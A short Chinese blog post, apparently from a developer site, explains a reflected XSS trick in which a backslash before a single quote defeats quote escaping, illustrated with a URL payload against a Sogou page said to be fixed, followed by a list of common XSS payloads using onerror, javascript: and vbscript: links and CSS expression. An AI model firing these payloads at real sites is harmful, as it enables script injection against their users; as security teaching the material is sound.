反射xss触发技巧之引号转义逃逸

不少xss防御机制较为成熟,但是引号转义却不转义转义符的情况,仍然可以进行逃逸并触发反射xss
,以最近的搜狗反射xss为例来讲(已修复)
在这里插入图片描述

https://xxx.xxx.com/hospital/ncp/guide.html?channel=hainan\%27;alert(1);//

此处的单引号被转义,然而在单引号前加上转义符,可以导致单引号逃逸,成功闭合,触发反射xss

XSS pyload

<img src=x onerror=prompt(1)>
<img src=x onerror=confirm(1)>
<div οnmοuseenter="alert('xss')">
<a href=javascript:alert(1) />1</a>
<div style="color: '<'; color: expression(alert('XSS'))">
<a href='vbscript:MsgBox("XSS")'>link</a>
%c1;alert(/xss/);//

  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值